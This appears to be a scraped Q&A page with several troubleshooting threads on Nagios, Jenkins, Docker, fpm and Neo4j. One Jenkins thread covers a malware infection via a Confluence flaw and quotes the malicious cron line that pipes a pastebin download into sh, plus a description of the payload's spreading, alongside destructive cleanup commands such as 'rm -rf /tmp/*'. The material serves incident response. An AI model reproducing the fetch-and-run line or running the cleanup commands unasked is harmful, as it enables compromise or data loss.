Nagios returns UNKNOWN status - monitoring

I installed Nagios on CentOS to monitor some servers, one of which is a TSM server.
I downloaded a plugin written in bash; when I execute it on the command line it works:
/usr/lib64/nagios/plugins/check_tsm db -v6
db - database utilization 42%, OK
and the return code of the bash script is 0 (from the command echo $?).
So the script works fine and returns 0, which should mean an OK status in Nagios, but the status is still UNKNOWN, and I really don't know why.
I also checked the Nagios logs, etc. It's not a problem with the command definition in commands.cfg or the service declaration, because I copied the exact command that Nagios runs automatically every 5 minutes and it works fine on the command line, yet the status is still UNKNOWN.
Definition of command:
define command{
    command_name    check_tsm_v6
    command_line    /usr/lib64/nagios/plugins/check_tsm $ARG1$ -v6 $ARG2$ $ARG3$
}
Service declaration:
define service{
    use                     generic-service
    host_name               tsm-test
    service_description     database utilization
    check_command           check_tsm_v6!db!85!90
}
And here's the bash script.

One thing that's caught me out in the past with Nagios scripts is user rights. When testing your script directly on the command line be sure to precede it with:
sudo -u nagios
So yours would be:
sudo -u nagios /usr/lib64/nagios/plugins/check_tsm db -v6
This assumes that your nagios instance is being run by the nagios user, which is a fairly safe bet.
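For example (a quick check; the plugin path is the one from your question), run the plugin as the nagios user and print its exit code in one go:
sudo -u nagios /usr/lib64/nagios/plugins/check_tsm db -v6; echo $?
If the output or exit code differs from what you get as your own user or root, a permissions problem (on the plugin itself, or on files and commands it calls) is the likely cause of the UNKNOWN status.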
Good luck
Brad

Try running yum install -y sysstat to install the package.
If that works, great. If you are still facing the same issue, please post the complete error that is shown in the browser.

Related

Jenkins Job to run SOQL query

I'm trying to get a Jenkins job to run sfdx force:data:soql:query commands in order to migrate configuration data sets between our production org and our sandboxes after a refresh. Certain configurations do not persist on a refresh so we need a way to move that data.
Running the queries from the command line on the Jenkins server works as expected; however, when the job runs it fails with the following error:
'C:\Program' is not recognized as an internal or external command, operable program or batch file.
Build step 'Execute shell' marked build as failure
The job does three things:
Authorizes to the DevHub, lists out the connected orgs, and then performs a SOQL query to just print some data - 16 lines to be exact. Here are the commands in the shell script of the job:
sfdx force:auth:jwt:grant -i ${CONNECTED_APP_CONSUMER_KEY} -u ${DEV_HUB} -f ${JENKINS_HOME}/certs/prod/server.key -r [...] -a DevHub
sfdx force:org:list
sfdx force:data:soql:query -u ${DEV_HUB} -q "SELECT Id, Name FROM [...tablename...]" -r human
I am completely stumped on why this is happening. Again, running the SOQL command directly on the server through PowerShell or Command Line works as expected. I would appreciate any help with this.
This one stumped me for a long time but we finally got it figured out.
If you are seeing this error, make sure to check your machine's environment variables. I saw a ton of other answers pointing to the same cause (the SFDX install path containing spaces, as in C:\Program Files\SFDX\bin), but they only showed some weird command-line FOR loop that made no sense whatsoever.
What we did was completely uninstall SFDX, making sure none of it was left on the machine, and reinstall it into a folder we made with no spaces in the path name.
Once we did that, our job worked like it was supposed to. I hope this helps others who run into this same issue.
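If reinstalling is not an option, another approach that usually works for paths with spaces is to quote the executable's full path, or prepend its directory to PATH, in the job's shell step. A minimal sketch, assuming the step runs under Git Bash / sh and that the CLI was installed to C:\Program Files\SFDX\bin (adjust both to your setup):
# call the CLI via its quoted full path so the space in "Program Files" is not split into separate tokens
"/c/Program Files/SFDX/bin/sfdx" force:org:list
# or put the bin directory on PATH for the rest of the step
export PATH="/c/Program Files/SFDX/bin:$PATH"
sfdx force:org:list
If the step actually runs under cmd (an "Execute Windows batch command" step), the equivalent is simply wrapping the full path in double quotes.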

Jenkins High CPU Usage Khugepageds

The picture above shows a process called khugepageds that is using 98 to 100% of CPU at times.
I tried to find out how Jenkins uses this process, or what to do about it, but was not successful.
I did the following
pkill jenkins
service jenkins stop
service jenkins start
When I pkill it, the usage of course goes down, but once Jenkins restarts it is back up again.
Anyone had this issue before?
So, we just had this happen to us. As per the other answers, and some digging of our own, we were able to kill the process (and keep it killed) by running the following command...
rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;
Make sure to replace PID_OF_khugepageds with the PID on your machine. It will also clear the crontab entry. Run this all as one command so that the process won't resurrect itself. The machine will reboot per the last command.
NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).
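As a rough sketch of the key-rotation part (the key type and file paths below are only examples, adjust them to your environment):
# generate a fresh key pair for the jenkins user, replacing the potentially exposed one
sudo -u jenkins ssh-keygen -t ed25519 -f /var/lib/jenkins/.ssh/id_ed25519
# then update the deploy keys / authorized_keys entries on GitHub, Bitbucket and any other
# machines that trusted the old public key, and remove the old key everywhere it was used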
Yes, we were also hit by this vulnerability; thanks to pittss's answer we were able to find out a bit more about it.
You should check /var/log/syslog for the curl pastebin script, which seems to start a cron process on the system; it will try again to gain access to the /tmp folder and install unwanted packages/scripts.
You should remove everything from the /tmp folder, stop Jenkins, check the cron entries and remove the ones that seem suspicious, and restart the VM.
The above vulnerability adds an unwanted executable to the /tmp folder and tries to access the VM via ssh.
This vulnerability also adds a cron entry on your system, so be sure to remove that as well.
Also check known_hosts and authorized_keys in the ~/.ssh folder for any suspicious ssh public keys. The attacker can add their own ssh keys to get access to your system.
Hope this helps.
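For example (a quick inspection; /var/lib/jenkins is assumed to be the home directory of the affected jenkins account, adjust to yours):
# review every key authorized to log in as the jenkins user; remove any entry you do not recognize
cat /var/lib/jenkins/.ssh/authorized_keys
# hosts this account has connected to; unexpected entries can hint at attempted lateral movement
cat /var/lib/jenkins/.ssh/known_hosts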
This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Possible solution
Do not run Confluence as root!
Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
Remove broken crontab: crontab -u <confluence_user> -r
Plug the hole by blocking access to the vulnerable path /rest/tinymce/1/macro/preview in the frontend server (a quick way to verify the block is shown after these steps); for nginx it is something like this:
location /rest/tinymce/1/macro/preview {
return 403;
}
Restart Confluence.
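To check that the block is actually in effect (confluence.example.com is a placeholder for your own frontend hostname), a request to that path should now come back with 403:
curl -i https://confluence.example.com/rest/tinymce/1/macro/preview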
The exploit
Contains two parts: shell script from https://pastebin.com/raw/xmxHzu5P and x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg
The script first kills all other known trojan/virus/botnet agents, downloads the binary to /tmp/kerberods and spawns it, and iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.
The binary, 3395072 bytes in size and dated Apr 5 16:19, is packed with the LSD executable packer (http://lsd.dg.com). I still haven't examined what it does. It looks like a botnet controller.
It seems like this vulnerability. Try looking in the syslog (/var/log/syslog, not the Jenkins log) for lines like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).
If you find that, try stopping Jenkins, clearing the /tmp dir, and killing all PIDs started by the jenkins user.
After that, if CPU usage goes down, try updating to the latest LTS version of Jenkins, and once Jenkins is back up, update all of its plugins.
A solution that works (because otherwise the cron file just gets recreated) is to empty jenkins' crontab file; I also changed its ownership and made the file immutable.
This finally stopped the process from kicking in.
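A rough sketch of that approach (the crontab path assumes a Debian/Ubuntu-style /var/spool/cron/crontabs layout; on Red Hat-style systems it is /var/spool/cron/jenkins):
# wipe the jenkins crontab that the malware keeps repopulating
crontab -r -u jenkins
# leave an empty, root-owned file in its place and make it immutable so it cannot be rewritten
: > /var/spool/cron/crontabs/jenkins
chown root:root /var/spool/cron/crontabs/jenkins
chattr +i /var/spool/cron/crontabs/jenkins
Remember to run chattr -i on the file again later if that user ever needs legitimate cron entries.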
In my case this was making builds fail randomly with the following error:
Maven JVM terminated unexpectedly with exit code 137
It took me a while to pay due attention to the khugepageds process, since everywhere I read about this error the suggested solution was to increase memory (understandably so: exit code 137 means the JVM was killed with SIGKILL, 128 + 9, typically by the out-of-memory killer).
The problem was solved with HeffZilla's solution.

How to run repo from a script inside a container in a jenkins job

I am unable to run repo non-interactively inside a container as part of a freestyle job.
It prompts for the user-name and email. I got round that by doing a git config --global inside the job.
But then it does the color test, and that hangs indefinitely.
Looking at the source code for repo I see this
if os.isatty(0) and os.isatty(1) and not self.manifest.IsMirror:
  if opt.config_name or self._ShouldConfigureUser():
    self._ConfigureUser()
  self._ConfigureColor()
So, I ran the following inside the container:
python -c "import os; print os.isatty(0), os.isatty(1)"
and, sure enough, it printed out True True
Looking at the Jenkins log, it launches the container with --tty specified, and there seems no way to configure that option.
I can't find a bash option to force a script to be run in a non-interactive shell. If I put the above python line in a file and execute it with almost any combination of commands and options, it still prints out True True
The only way I see something different is if I use I/O redirection
bash <a.sh
which prints out False True - i.e. stdin is not a tty, and
bash <a.sh >a.log
which prints False False.
For a complex script, are there any problems using the bash <script approach?
Does anyone know any jenkins magic to prevent docker being launched using --tty?
I know that the --tty is the culprit. I built the container locally and ran the following
$ docker run repotest python -c "import os;print os.isatty(0), os.isatty(1)"
False False
$ docker run --tty repotest python -c "import os;print os.isatty(0), os.isatty(1)"
True True
Running Versions:
repo: 1.12.37 (per Ubuntu 16.04 apt-get)
Jenkins: 2.149
Cloudbees Docker Plugin: 1.7.3
Container base is ubuntu:xenial
I'm using the "Build inside a docker container" option.
To run the bash script repo_script.sh "non-interactively", or more precisely without terminals associated with its standard streams, you could run your script simply as
repo_script.sh < /dev/null 2>&1 | cat
assuming you want to see the output the way you would see it when running simply repo_script.sh. By piping standard output and error to a different process, the file descriptors appear to repo_script.sh as pipes rather than a TTY. You could also direct the output to a file, or even to /dev/null if you do not care about it:
log_file=/dev/null
repo_script.sh < /dev/null > "${log_file}" 2>&1
Running the script as
bash < repo_script.sh | cat
might work too, though it is a very unorthodox and, to my mind, hackish way of running a script just to break the association of the TTY with standard input. From the script engine's point of view, reading a script program from a file is different from reading it from standard input (which, if it is a terminal, is typically not seekable), so there might be some subtle differences that could bite you in unexpected ways. This approach also does not clearly communicate your intention to the next person who needs to understand your code, and may lead to partial hair loss in that person due to extraneous head scratching.
There is no need for any bash options; just using the stream redirections from within the invoking shell as described above is an easy-to-comprehend, multi-platform, standard convention for changing the standard stream associations.
P.S. I think it should be enough for your repo script to just test whether standard input is a TTY. It looks to me like the author of that script did not think it through there. There is simply no point waiting for input if there is no terminal device associated with standard input; from that you could determine that everything needs to run without user interaction, or stop with an error if that is not possible.
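For comparison, here is how a plain shell script can make that decision itself (a minimal sketch, not taken from repo; the prompt and the USER_NAME fallback variable are made up for illustration):
#!/bin/bash
# prompt only when stdin is attached to a terminal, otherwise fall back to a non-interactive default
if [ -t 0 ]; then
  read -r -p "User name: " user_name
else
  user_name="${USER_NAME:-jenkins}"
fi
echo "Using user name: ${user_name}"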

fpm is not recognised when executing a script with Jenkins and ssh

I am trying to execute a script over an ssh connection with Jenkins. I am using the SSH plugin and it is configured correctly. I manage to execute the first part of the script, but when I try to execute an fpm command it says:
fpm: command not found
If I connect to the instance and run the same script that I call via Jenkins it runs and there is no error (fpm is installed).
So, I have created a test script test.sh:
#!/bin/bash -x
fpm
but with Jenkins I get the same error, fpm: command not found, while if I execute it myself I get the normal "parameter needed" output:
Missing required -s flag. What package source did you want? {:level=>:warn}
Missing required -t flag. What package output did you want? {:level=>:warn}
No parameters given. You need to pass additional command arguments so that I know what you want to build packages from. For example, for '-s dir' you would pass a list of files and directories. For '-s gem' you would pass a one or more gems to package from. As a full example, this will make an rpm of the 'json' rubygem: `fpm -s gem -t rpm json` {:level=>:warn}
Fix the above problems, and you'll be rolling packages in no time! {:level=>:fatal}
What am I missing? Why can't it find fpm if it is installed?
Make sure fpm is in /usr/bin.
It seems that the problem was that fpm was installed in /home/user2connect/bin/, and so the command was not recognised. To fix this I had to call it with the whole path:
/home/user2connect/bin/fpm ...
I have chosen to reinstall fpm using sudo, so now it works.
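Another option, instead of hard-coding the path or reinstalling, is to extend PATH at the top of the script, since a non-interactive ssh session does not load the same profile files as your login shell. A sketch, assuming fpm really lives in /home/user2connect/bin as above:
#!/bin/bash -x
# make the user-local bin directory visible to this non-interactive ssh session
export PATH="$HOME/bin:$PATH"
fpm --version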

Error Running Neo4j with Systemd on Arch Linux

I've got neo4j installed on my arch linux setup, and am able to start the server manually (sudo neo4j start). However, when I try to start it using systemctl start neo4j, I get
Job for neo4j.service failed. See 'systemctl status neo4j.service' and
'journalctl -xn' for details.
Neither of the suggestions in the error message gives anything helpful. I have /usr/lib/systemd/system/neo4j.service:
[Unit]
Description=Neo4j
[Service]
User=root
Type=forking
ExecStart=/usr/bin/neo4j start
ExecStop=/usr/bin/neo4j stop
PIDFile=/run/neo4j/neo4j-service.pid
#LimitNOFILE=40000
[Install]
WantedBy=multi-user.target
I've tried changing the User between neo4j and root, and I originally had LimitNOFILE not commented out, before I tried setting the limits in security/limits.conf (which got rid of the file number error when starting it normally). This setup is mentioned in the AUR, but I just can't get it working. Any help is appreciated!
I have just attempted to set up Neo4j on a fresh Arch VM and this has worked successfully. The steps I followed were:
Boot
Install wget and jdk7-openjdk by running pacman -S wget jdk7-openjdk
Download Neo4j package from the AUR using wget https://aur.archlinux.org/packages/ne/neo4j/neo4j.tar.gz
Unzip package with tar xvf neo4j.tar.gz
Change dir cd neo4j
Build package using makepkg (this downloads Neo4j from dist.neo4j.org)
Install with pacman -U neo4j-2.1.5-1-any.pkg.tar.gz
As per the messages received during installation, create configuration to point at the installed JDK:
mkdir /etc/systemd/system/neo4j.service.d
echo "[Service]" >> /etc/systemd/system/neo4j.service.d/java_home.conf
echo "Environment=JAVA_HOME=/usr/lib/jvm/default" >> /etc/systemd/system/neo4j.service.d/java_home.conf
Start the server with systemctl start neo4j.service
Check the server is running with curl http://localhost:7474/db/data/
If this works, a JSON response will be shown.
As I can't tell exactly the steps you went through to install or what your file system may look like, your best bet will probably be to compare the steps you went through with these above and see where the differences are.
At a guess, I'd recommend looking at your Java installation first to see if the service is having trouble finding the Java runtime. This is certainly the most fiddly part of the whole process.
Note: I used the JDK here but I don't see why the jre7-openjdk package should not work just as well.
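One more thing worth checking if you created or edited the drop-in after systemd already knew about the service (a small sketch; the unit name is the same as above):
# pick up new or changed unit and drop-in files
systemctl daemon-reload
# confirm the JAVA_HOME override is actually applied to the unit
systemctl show neo4j.service -p Environment
# then retry the start and read the full log for the unit
systemctl start neo4j.service
journalctl -u neo4j.service -e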
Have you tried this modified unit for the file /usr/lib/systemd/system/neo4j.service?
[Unit]
Description=Neo4j
[Service]
User=neo4j
Type=forking
RuntimeDirectory=neo4j
RuntimeDirectoryMode=770
ExecStart=/usr/bin/neo4j start
ExecStop=/usr/bin/neo4j stop
ExecReload=/usr/bin/neo4j restart
RemainAfterExit=no
Restart=on-failure
PIDFile=/run/neo4j/neo4j-service.pid
LimitNOFILE=60000
TimeoutSec=600
[Install]
WantedBy=multi-user.target
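If you go this route, note that /usr/lib/systemd/system/ belongs to the package and may be overwritten on upgrade. A small sketch of keeping the change in /etc instead (same unit contents, just a different location) and reloading it:
# local unit files in /etc/systemd/system override the packaged ones and survive upgrades
sudo cp /usr/lib/systemd/system/neo4j.service /etc/systemd/system/neo4j.service
# edit /etc/systemd/system/neo4j.service to contain the unit above, then:
sudo systemctl daemon-reload
sudo systemctl restart neo4j.service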
